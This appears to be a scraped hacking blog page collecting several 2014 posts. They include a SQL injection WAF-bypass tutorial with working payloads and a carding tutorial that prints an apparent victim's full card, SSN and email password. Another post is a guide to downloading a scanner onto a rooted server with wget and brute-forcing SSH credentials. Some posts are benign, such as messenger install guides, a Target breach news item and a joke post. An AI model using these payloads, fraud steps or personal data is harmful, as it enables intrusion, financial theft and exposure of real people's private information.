\

Featured

Powered by Blogger.

Blog Archive

Browsing "Older Posts"

Hello ! 

Today I am going to show you how to bypass Web Application Firewalls (WAF).

Let's Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL Injections (usually the "UNION SELECT" command), you get an 403 Error (and the website says "Forbidden" or "Not Acceptable").

Example:
Code:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4....
(We get a 403 Error!)


Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF...

1) Comments:
You can use comments to bypass WAF:

Code:
Code:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4....
(First Method that can Bypass WAF)


However, most WAF identify this method so they still show a "Forbidden" Error...

2) Change the Case of the Letters:
You can also change the Case of the Command:

Code:
Code:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4....
(Another Basic Method to Bypass WAF!)


However, as before, this trick is also detected by most WAF!

3) Combine the previous Methods:

What you can also do is to combine the previous two methods:

Code:
Code:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4....
This method is not detectable by many Web Application Firewalls!

4) Replaced Keywords:

Some Firewalls remove the "UNION SELECT" Statement when it is found in the URL... We can do this to exploit this function:

Code:
Code:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4....
(The "union" and the "select" will be removed, so the final result will be: "UNION SELECT" :-D )
This method doesn't work on ALL Firewalls, as only some of them remove the "UNION" and the "SELECT" commands when they are detected!

5) Inline Comments (Thanks to Crysan):
Some firewalls get bypassed by Inserting Inline Comments between the "Union" and the "Select" Commands:
Code:
Code:
http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4...
(The U is equal to "U" and S to "S". See more on the Advanced Section....)

I believe that these are the most basic Methods to WAF Bypassing! Let's move on more advanced ones...


Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

Code:
Code:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4....

(( You can test if the WAF can be crashed by typing:
?page_id=null
/**//*!50000UnIOn*//*yoyu*/all/**/
/*!SeLEct*/
/*nnaa*/+1,2,3,4....

If you get a 500, you can exploit it using the Buffer Overflow Method! :: Thanks Crysan for the Test))


2) Replace Characters with their HEX Values (Thanks to Crysan!):
We can replace some characters with their HEX (URL-Encoded) Values.

Example:
Code:
Code:
http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4....
(which means "union select")
Text to Hex Encoder (Choose the "Hex Encoded for URL" result!): http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the "UNION SELECT" other commands might be blocked.
Common Commands Blocked:
Code:
Code:
COMMAND | WHAT TO USE INSTEAD

@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()

[!]-> You can also try to SQL Inject with the NAME_CONST Method: http://is.gd/o10i0d (Created by Downfall)
Learning MySQL Really helps on such issues! ;-)

4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:
The firewall below replaces "*" (asterisks) with Whitespaces! What we can do is this:

Code:
Code:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4...
(If the Firewall removes the "*", the result will be: 15+union+select....)



So, if you find such a silly function, you can exploit it, in this way! :-D

[+] In addition to the previous example, some other bypasses might be:

Code:


Code:
-15+(uNioN)+(sElECt)....

-15+(uNioN+SeleCT)+...

-15+(UnI)(oN)+(SeL)(ecT)+....

-15+union (select 1,2,3,4...)
Tags:

Advanced WAF Bypassing

By admin → Friday, January 31, 2014
Posted by admin at 5:39 PM 0 comments
Labels:


A lot of people and members on this website dont know how to card, so i will do my best to explain basics of carding in this thread.


Dont be lazy, read it all!!!

First lets start on what you need:

1. Computer, macbook, laptop, etc...

2. A virtual private network (VPN) extends a private network across a public network, such as the Internet. It enables a computer to send and receive data across shared or public networks as if it was directly connected to the private network, while benefitting from the functionality, security and management policies of the private network.[1] This is done by establishing a virtual point-to-point connection through the use of dedicated connections, encryption, or a combination of the two.
( You got a lot of free vpn software on internet, or trial)
Here is link where you can get VPN software for free or premium ones 

http://www.start-vpn.com/tag/free-trial/

3. RPD - Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software.
Clients exist for most versions of Microsoft Windows (including Windows Mobile), Linux, Unix, Mac OS X, iOS, Android, and other modern operating systems. RDP servers are built into Windows operating systems; an RDP server for Linux also exists. By default, the server listens on TCP port 3389.
Microsoft currently refers to their official RDP server software as Remote Desktop Services, formerly "Terminal Services". Their official client software is currently referred to as Remote Desktop Connection, formerly "Terminal Services Client"

You can connect to RDP by clicking on start menu - remote desktop connection - then type victims ip address. Example 74.7.42.89,click connect, now it will pop up screen asking for password and username which is in this case: User name: Shipping Password shipping1. Now click ok, and you will get access to Remote Desktop Connection - which means you are connected to someone computer and you will buy stuff from victims computer. Not YOURS!

4. Socks 5 SOCKet Secure (SOCKS) is an Internet protocol that routes network packets between a client and server through a proxy server. SOCKS5 additionally provides authentication so only authorized users may access a server. Practically, a SOCKS server proxies TCP connections to an arbitrary IP address, and provides a means for UDP packets to be forwarded. SOCKS performs at Layer 5 of the OSI model (the ******* layer, an intermediate layer between the presentation layer and the transport layer).

You can get socks for free http://hidemyass.com/proxy-list/,
or you can buy fresh witch i reccomend 

http://www.vip72.com/?drgn=1

How to use socks5? Example of socks4/socks5 are 75.119.127.189:36871
Socks5 are very easy to use via Mozilla Firefox. First open Mozilla Firefox, next step
is firefox - options - advanced - network - connections - settings. Now the screen will pop up varius options like : 1. No proxy; 2.Auto Detect; 3.Use system proxy; 4. Manual proxy configuration. You mark 4. Manual proxy configuration. Now type in socks host IP you have, example Socks Host: 75.119.127.189 Port: 1080. Press ok and you are connected to secure socks5. Will explain more when we start carding.

5. Victims credit card, you can get a lot of free credit cards here on ABH, or you can buy one from variuos cvv shops that can be find on internet. Example off victims credit card:
First Name : harvey
Middle Name : james
Last Name : menehan
Spouse Name :
Father Name :
Billing Address : 9006 peppertree circle
City : wichita
State : KS
Zip Code : 67226
Country : US
Phone Number : 3166342050
Credit Card Information :
*********
Card Type : Credit
Credit Card Number : 5102 4129 0001 1332
Exp. Date : 6/June / 2012
Name On Card : H. James Menehan
Cvv2 : 474
Mother Maiden Name : penny
Social Security Number : 515 16 4160
Birth Day : 28
Birth Month : 02
Birth Year : 1926
Account Information :
*******
AOL ID : hjimdoc@aol.com
Password : Jm6227mh

Note: This is only example off victims credit card, you dont need all this information to card like DOB (date of birth) SSN (social security number) etc. Some sites ask only for card numbers, exp date and cvv2.

Now that you have all this above, lets start carding


Lets say we want free phone like Samsung S4, IPHONE 5, Sony Z etc...
First of all i want to recommend a website shop from your country. Why? Because you dont need to wait a lot for you package. In my country they delliver in 2 days, most 3 days. I am sure there is a lot of cell phones shops in any country. Use google and find it.

There is two types of shops, VBV and NON VBV:

VBV is a Verified by Visa, an online security system for credit card transactions. Which means you need to provide a card knowing a lot of victim credit card information such as DOB (date of birth), SSN (social security numbers), Secure password witch cc owner use for online purchase. You can check on shop is there a VBV VERIFIED BY VISA ICON on home page.

NON VBV is not verifired by visa card, you can buy anything with non vbv cards without going thru 3d verification process.

We leave now this for later.

1. Connect to your vpn software and chose ip - country you want.

2. Connect to RPD ( Remote Destkop connection), must be same country (IP), state as card holder Address. Do not forget that.

3. Now from your RPD, connect to socks5 via mozzila firefox, example 97.77.96.226 34539 United States, MUST BE SAME ASS CARD HOLDER: COUNTRY, STATE, CITY!

4. When you done all that, create email with same name as credit card holder name, same address, same city, and everything. Or if you got email access thats whould be a lot better .

5. Go to your website shop you want to card. ( dont be lazy and find a good yours private shop from your country or any other that ships worldwide).

6. Register with credit card holder information, name, country, city, address, and email you made one just for this ORDER.

7. Add a shipping address, some sites dont allow to ship to diffrent address but there is planty of shops witch do. Shipping address is where package will be dellivered. Which means you provide your address, girlfriend address, friend address, to your drop etc.

8. Select product you want, and click on check out, now it will ask for you know, how you will pay. Choose credit card, and type victims credit card numbers and other information needed.

9. Click order now, and i am sure 100000000000% they will confirm your order via email or you will get track your order on website, after pressing order.
(note that some sites need phone verification, but you can always buy phone number, confirm your order, and destroy it after they ship your item) its how i do it.

10. Wait for order to arrive to your shipping address, I personally use FEDEX, EURO EXPRESS, CITY EXPRESS. When they arrive they call me, and i can say difrent
adress where i want to pick up my order. Sign in with fake name you provided and run xDDDDDDDDD. Just joking. Be a calm down like you just stole 100 MILION US DOLLARS and take the package. Use item for you
Tags:

Carding tutorial for complete amateurs!

By admin →
Posted by admin at 5:23 PM 0 comments
Labels:
Assalamualaikum...

Pada BBM versi sebelumnya yang telah dirilis khusus untuk pengguna Android ICS ke atas. dan kini pengguna Android Gingerbread juga sudah bisa menikmatinya juga setelah diluncurkan BBM khusus Android gingerbread yang mana masih dalam versi beta. meskipun begitu, aplikasi BBM ini tetap bisa berjalan dengan baik di Android Gingger bread. It's work! Tested on Samsung Galaxy Young ARM 6.

BBM for Android 2.3 Gingerbread : Download

Invite me!!
Mohon sedikit meluangkan waktu, untuk memberikan donasi dengan membuka gambar Sponsor..

Langkah-langkah instalasi:

Step 1 : pertama download aplikasi BBMnya dulu yahh :)

Step 2 : kemudian install BBMnya keperangkat Android sobat


Step 3 : Buka aplikasi BBMnya, lalu klik Sign in!


Step 4 : Masukan ID Bbmnya, kalo belum ada silahkan daftar dulu..


Step 5 : Buat nama profilnya, trus klik Continue



Step 6 : Klik Tap sampe notif yg muncul hilang..


Step 7 : Done! BBMnya sudah bisa digunakan :)


Begitu saja tutorialnya,, jika ada masalah.. silahkan tanyakan dengan meninggalkan komentar :)

Author : Onix AQua

Tags:

Install BBM for Android 2.3 Gingerbread

By admin →
Posted by admin at 3:58 AM 0 comments
Labels:

Install Blackberry Messenger

Setelah diluncurkannya aplikasi messenger besutan RIM Motion yaitu Blackberry Messenger untuk Android dan iOS beberapa waktu yang lalu membuat aplikasi ini menjadi sangat didambakan para jejaring sosial, mengingat aplikasi messenger ini merupakan yang paling terlaris dan paling banyak penggunanya yang terhubung hanya melalui perangkat Blackberry saja. Saat ini semua pengguna Android dan iOS telah bisa menikmati aplikasi tersebut dengan Gratis.  Readmore...

Install WhatsApp Messenger

Whatsapp adalah aplikasi chat messenger yang diperuntukkan untuk semua jenis perangkat mobile dari segala jenis sistem operasi. aplikasi ini bisa berjalan di hampir semua perangkat mobile yang menggunakan sistem operasi seperti Java, Windows phone, Symbian, Android, iOS, BB, dan beberapa sistem operasi lainnya. hanya saja aplikasi ini tidak mendukung untuk digunakan di PC. tapi tidak perlu khawatir, karena aplikasi ini bisa dijalankan dengan bantuan sebuah emulator. Readmore..

Install WeChat Messenger

Wechat merupakan sebuah aplikasi sosial media yang berupa chatting ato bisa juga disebut obrolan, dimana saat ini aplikasi ini sangat populer di Indonesia selain BBM. Aplikasi ini sendiri bisa berjalan pada smartphone yang menggunakan system operasi  berbasis Android, Windows, Mac, Symbian dan Java. Readmore...

 

Install Line Messenger

Line merupakan sebuah aplikasi baru yang mana bisa digunakan untuk membuat panggilan suara dan mengirim pesan secara gratis kapanpun dan dimanapun kamu berada selama 24 jam. Readmore...

Mohon sedikit meluangkan waktu, untuk memberikan donasi dengan membuka gambar Sponsor.. Thanks

 

Install Kakao Talk

Kakao Talk merupakan sebuah aplikasi messenger smartphone untuk panggilan dan kirim pesan. selain itu bisa juga untuk mengirim foto, video, suara, dan lokasi. Meskipun aplikasi ini diperuntukkan untuk perangkat smartphone, tapi kini aplikasi ini bisa digunakan di PC. Readmore...


Author : Onix AQua
Tags:

Cara Install Aplikasi Messenger BBM, Whatsapp, WeChat, Line, Kakao Talk, Di PC

By admin → Wednesday, January 29, 2014
Posted by admin at 9:06 AM 0 comments
Labels: ,


Assalamuallaikum sobat Indonesian Cyber Army :D
Ini kok judulnya cara hack hati wanita? hahaha soalnya kebanyakan pengunjung blog ini kaum adam jadi yah judulnya "Cara Hack Hati Wanita" aja heheh :D

Okay, setelah baca status yang muncul diberanda saya, saya jadi pengen ngebahas juga di blog ini. Oke pada umumnya aksi hacking umumnya hanya berlaku di dunia maya bukan? sekarang kita coba kupas hacking ini ke dunia nyata :)

Jika di dunia hacking kita berhasil mendapatkan sebuah website ada langkah seperti :
Gathering Information > scaning  > Exploitation  > Upload Backdoor > Deface > Archive 
Pada cara mendapatkan wanita pun juga ada rundown nya. Oke kita mulai ya :D

1. Gathering Information



Gathering Information atau yang bisa disebut juga tahap perkenalan, pada tahap ini saya harap sih kalian jangan melakukan kesalahan yang tidak perlu. Ada baiknya sebelum berkenalan cari tau dulu infromasi mengenai doi, semisal kalian cari tau dulu kesukaan dia di jejaring sosial, cari tau kegiatan dia     pokoknya coba stalking ke akun  jejaring sosial doi deh. Yah supaya pas waktu perkenalan tidak membosankan :D . Bisa juga bagi elu elu yang gak berani ngajak berkenalan sama doi, coba aja ajak kenalan lewat jejaring sosial siapa tau bisa ketemuan :D

2. Scaning



Scaning cari tau sebanyak banyaknya informasi tentang doi, yaah biar gak nyesel nantinya kalau berhasil di dapetin hehe. Cari tau dah mulai dari kebiasaannya dia, makanan kesukaannya dia, musik kesukaan dia bahkan sampek kapan dia mau boker juga boleh hehhe :D . Intinya pada tahap ini cari tahu informasi yang kalian perlukan untuk bisa lebih dekat dengan doi, bisa juga minta bantuan temen-temen doi, secara kalau temen kan pasti tau kesukaan doi :D

3. Exploitation


Nah jika dalam dunia defacing Exploitation adalah mengeksekusi suatu bugs yang berhasil ditemukan, nah kalau untuk urusan cinta beda bro :D . Exploitation yang dimaksud dalam cinta adalah masa-masa PDKT, lah iya dong setelah kita tau kesukaan doi nah kita pikat deh hati doi. Kasih dah doi perhatian yang lebih tapi inget jangan over ya, takutnya doi jadi ilfeel sama elu pada hahaha :D cukup perhatian seperti biasa aja, dan jangan terlalu berharap lebih dalam tahap ini. Banyak yang gagal dalam tahap ini karena mereka sudah buru-buru menembak doi karena mereka kira doi sudah klepek klepek sama kita haha :D . Jangan cepet-cepet bro relax ajaa takutnya kena PHP nanti eh bukan PHP sih, tepatnya ke GEERan hahaha :D okay lanjut aja yaa saya yakin elu pada udah lebih pinter soal urusan PDKT :D

3. Upload Backdoor


Nah penting nih bro, pada tahap ini tanem dah benih benih cinta ke dia. Elu boleh mulai pancing dia buat suka ke elu, kasih perhatian yang lebih dan sesekali bilang aja kalau elu sayang sama doi. Okay bro jangan malu malu pokoknya :D . Intinya pada tahap ini cari tau apakah dia udah suka sama elu apa belum pancing pancing lah gimana caranya, misal coba ajak mesra-mesraan gitu pancing dengan emot :* ( inget tahap ini mesra"annya saya anjurin lewat SMS / semacamnya ya, kalau langsung di dunia nyata bukan cinta yang lu dapet bogem mentah yang elu terima hahaha ) . Pokoknya rayu dia aja deh bro nah jika dia udah respond lanjut deh ke step ke 4.

4. Deface


Tahap perkenalan sampai pendekatan udah, sekarang waktunya nembak doi. Iyalah apalagi kalau bukan ditempak? mau PHPin dia? Tapi inget bro tahap ini elu lakuin setelah elu pada yakin dia suka sama elu jangan kayak step ke 2 ujung-ujungnya ke GRan :D . Kalau cara nembak tau sendiri kan? ajak ke tempat romantis gitu atau pokoknya yang "anti mainstream" supaya anggapan doi elu cowok yang unik pokoknya buat supaya dia terkesan aja deh :D

5. Archive


Nah ini nih bro tahap yang paling penting jika doi nerima cinta elu, jangan lupa kasih ane Pajak Jadian gitu kalau udah jadian hahahha :D . Bercanda bro, tahap ini abadikan deh momen pas kamu nembak dia bisa juga inget" waktu kamu nembak doi. Yang saya tau, kebanyakan cewek sebel sama pacarnya kalau si cowok lupa hari jadi mereka :D

Oiya mblo, saya ingetin kalau udah berhasil upload shell dalam urusan cinta jangan coba coba lu symlink ataupun  di rooting yaa daripada lu kena tampar :v wkakwkaw :D
lebih baik lu patch bugnya supaya gak ada attacker lain yang deketin pacar elu :)

Dah segitu aja bro, tips hack hati cewek :D jika ada pemikiran lain bisa kali kasih di komentar :D
Oh iya, sekali kali kita jangan terlalu serius di dunia hacking, okay bro hehe itung itung Intermezo aja :)
Trimakasih!

Author : Bimo Septiawan
Tags:

Cara Hack Hati Wanita

By admin → Tuesday, January 28, 2014
Posted by admin at 6:59 AM 0 comments
Labels:
Vega adalah scanner gratis dan open source dan platform penetration test untuk menguji keamanan aplikasi web. Vega dapat membantu Anda menemukan dan memvalidasi SQL Injection, Cross-Site Scripting (XSS),  mengungkapkan informasi sensitif, dan kerentanan lainnya. Scanner ini ditulis dalam bahasa Java, yang berbasis GUI, dan dapat berjalan pada Linux, OS X, dan Windows.

Vega mencakup scanner otomatis untuk pengujian secara cepat dan memiliki fitur proxy dalam pemeriksaan taktis. Vega scanner dapat menemukan XSS (cross-site scripting), injeksi SQL, dan kerentanan lainnya. Vega dapat dikembangkan dengan menggunakan API dalam bahasa web: Javascript.

FETURES

Modules
  • Cross Site Scripting (XSS)
  • SQL Injection
  • Directory Traversal
  • URL Injection
  • Error Detection
  • File Uploads
  • Sensitive Data Discovery
Core
  • Automated Crawler and Vulnerability Scanner
  • Consistent UI
  • Website Crawler
  • Intercepting Proxy
  • SSL MITM
  • Content Analysis
  • Extensibility through a Powerful Javascript Module API
  • Customizable alerts
  • Database and Shared Data Model

Untuk menjalaankan scanner ini dibutuhkan aplikasi Java sebagai pendukung.


Download Subgraph Vega Web Vulnerability Scanner :
Tags:

Subgraph Vega Web Vulnerability Scanner

By admin → Sunday, January 26, 2014
Posted by admin at 11:30 PM 0 comments
Labels: ,


Asssalamualykum wr.. wb bertemu lagi dengan alvin solissa- kali ini ane mau sharing sedikit tentang cara menjebol password windows7 dengan HBCD. sportifitas guys ane adalah type orang yg suka praktek secara langsung tanpa menggunakan Virtual Mechine workstation 9 kemarin ane mencoba membuat cloning OS windows 7 di samsung dengan mainboard yang berbeda, dimana 2 laptop saya jadikan sebagai kelinci percobaan dan yang satu samsung punya adik saya dari bursel saya jadikan sebagai server mastering osnya. owh iya bagusnya mainboard AMD ya  . okay nggka usah banyak basa-basi  nanti entar di bilang cerewet lagi hehehe...!! kita langsunga aja Ke-TKP. are you ready? Yes, I'm Ready!





Okay langsung ke topik kasusnya:

*Download dulu softwarenya disini


1. Siapkan PC atau Laptop/Netbook Yang akan dibobol passwordnya


2. Siapkan juga cd hiren’s-nya anda boleh boot lewat flashdisk untuk tutorialnya disini


3.jika udah berhasil  maka tampilannya seperti dibawah ini  dan pilih menu “Password & Registry Tools” 


4. Setelah itu, pilih menu “ Active Password Changer v.3.0” (Tergantung Hirens yg anda Download) Lalu tunggu hingga selesai prosesnya dan muncul menu seperti gambar berikut : 











Pilih menu “Choose Logical Drive”



5. Tunggu beberapa saat, Lalu pilih letak partisi OS-nya sesuai partisi harddisk anda







6. Selanjutnya tunggu proses pencarian database password windows anda hingga terdeteksi, jika sudah selesai prosesnya maka akan muncul path dimana windows menyimpan databasenya seperti berikut :







7. Tentu saja untuk melanjutkannya tekan tombol “Enter”. Nah diproses ini kita menentukan nama user yang akan dibobol passwordnya







Pilih user yang akan dipassword lalu tekan “Enter”



8. Selanjutnya pilih parameter account yang akan diubah











9. Setelah itu tekan tombol “Y” lalu restart Pc atau Laptopnya dan masuk ke windows--->>> sekarang tanpa ada USER NAME & PASSOWRD lagi brow..!! Good Luck





Tags:

Cara Jebol/Hack Password windows dengan Hiren's Boot CD

By admin → Thursday, January 23, 2014
Posted by admin at 4:01 AM 0 comments
TARGET POS Malware author Sergey Taraspov russia
The Holiday data breach at TARGET appeared to be part of a broad and highly sophisticated international hacking campaign against multiple retailers, involving the heist of possibly 110 million Credit-Debit cards, and personal information.

Target confirmed last weekend that a malicious software was embedded in point-of-sale (POS) equipment at its checkout counters to collect secure data as the credit cards were swiped during transactions.

The Malware called 'BlackPOS' also known as "reedum" or 'Kaptoxa' is an effectivecrimeware kit, that was created in March 2013 and available in underground sites for $1800-$2000.

Investigators from IntelCrawler found a 17-years old hacker who actually developed the BlackPOScrimeware kit. His nickname is 'ree4' and original name: 'Sergey Taraspov' from St.Petersburg and Nizhniy Novgorod (Russian Federation).
IntelCrawler's sources mentioned that the BlackPOS malware was created in March 2013 and first infected the Point-of-Sales environments in Australia, Canada and the US.

Alleged Russian hacker and malware developer Sergey Taraspov (ree4) sold more than 40 builds of BlackPOS to cybercriminals from Eastern Europe and other countries.

BlackPOS is a RAM-scraping malware totally written in VBScript i.e. It copies credit-card numbers from point-of-sale machines' RAM, in the instant after the cards are swiped and before the numbers are encrypted.

In December, after the TARGET data breach, the Symantec antivirus firm discovered the malware and dubbed as 'Infostealer.Reedum.C'.
'He is a very well known programmer of malicious code in underground and previously he has created several tools used in hacking community for brute force attacks, such as "Ree4 mail brute", and also earned some first money with social networks accounts hacking and DDoS attacks trainings, as well as software development including malicious code.'
17 Year Old Russian hacker identified as BlackPOS Malware author, responsible for TARGET data breach
More details about Sergey Taraspov (ree4):
E-mail 1: ree4@list.ru
E-mail 2: ree4@yandex.ru
ICQ: 565033
Skype: s.r.a.ree4

Now any of his toolkit buyer is possibly the culprit behind the Target data breach. According to researchers, the attackers somehow managed hack one of the TARGET server and uploaded the POS malware to the checkout machines located at various stores.

IntelCrawler didn’t accuse him of the Target heist, but "He is still visible for us, but the real bad actors responsible for the past attacks on retailers such as Target and Neiman Marcus were just his customers". They said.
Tags:

TARGET Data Breach developed by 17-Year Old Russian Hacker

By admin → Wednesday, January 22, 2014
Posted by admin at 6:14 PM 0 comments
Labels:


Well i have watched so many times someone rooted a server and mass-deface it And i was like WTF? Why dont they use it for something ealse....Till today like i promised a Tutorial what to do after you got Root on the server 

So lets start What To Do Next?

-Well after geting root privileges you can do what ever you wonna with the server installing/removing/updating/adding users/browe everything.
But am not going to speak about anything above this...Am going to show you how to use the Root in the best way possible 

-I dont know if anyone of you have hearded about SSH(Secure Shell Hosting) this is on port 22 its connecting on the routher and sometimes directly on the PC.This is used for hidding you ass  Am using it when am doing something really stupid .Today we are going to Scan for SSH(SecureShellHosting).

What We Need:
*Root Priv. On Some Server
*Putty
*Scanner
*Patience

1st _...Putty...._

Download Link For Putty:

Code:
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
Download putty and connect to your hacked Server 

2nd. ~Scanner~

After we connect to our Victims PC(Server) we need to get a scanner.
Here is one 
[code]http://www.freewebs.com/gbl-net/cristina.tgz/[code]
Now to download it from there we use wGet Command
Code:
wget http://www.freewebs.com/gbl-net/cristina.tgz

When the download finish we need to extrat this scanner from his file and for that we use
Code:
tar -zxvf scanner_name.tgz
in this case:
Code:
tar -zxvf cristina.tgz

Than we need to enter the folder where are the files from the scanner :
Code:
cd Scanner_Folder_Name
This case:
Code:
cd Cristina

And we give all files 777 permisions so they can be executed easly from anyuser not only root
Code:
chmod +x *

After we done all this we can start scanning now you can use from proxys ips am going to use
Code:
189.254.237.190
but we do not enter the whole IP we only enter the first 2 numbers
Code:
189.254
And now we start scaning by executing this:
Code:
./start 189.254

Now we wait till the scaning ends  After the scan ends its brute-forcing time its checking for user and password  and we still gonna to wait 
After The Scan and BruteForcing ends you can open the vuln.txt and see something like this:
Code:
cat vuln.txt
*Note: Non Of This Works..This is just to show you how it will looks!
Code:
test:test 68.15.219.98 
oscar:oscar 68.16.249.206
user:user 68.19.179.99 
test123:123456 66.113.138.78
user:1234 67.19.130.75 
guest:guest1 67.53.138.125
root:admin 67.53.145.51 
root:pa55word 67.55.5.81 
oracle:oracle 67.69.131.94 
oracle:oracle 67.69.131.30 
user:user 67.78.114.180 
root:abc123 67.78.170.186
tomcat5:tomcat5 67.87.115.176 
admin:sysmail 67.90.99.71 
root:beach 67.90.99.71
stud:stud 67.90.99.71 
trash:trash 67.90.99.71
aaron:aaron123 67.90.99.71 
gt05:gt05 67.90.99.71
william:william 67.90.99.71
stephanie:stephanie 67.90.99.71 
root:hamster 67.90.99.71
root:welcome1 67.90.99.71 
root:admin 67.90.36.86 
root:admin 67.90.36.85 
diane:diane 67.98.52.24
admin:sysmail 189.254.204.116 
root:beach 189.254.204.116 
stud:stud 189.254.204.116 
trash:trash 189.254.204.116
















Thank You For Reading This Tutorial If You Like It Feel Free To Comment!
                                   
                                           
  • Facebook
  • Twitter
  • Google Buzz
  • StumbleUpon
  • Digg
  • Delicious
  • LinkedIn
  • Reddit
  • orat


Tags:

what to do after root server

By admin →
Posted by admin at 5:01 PM 0 comments
Labels:
Subscribe to: Posts ( Atom )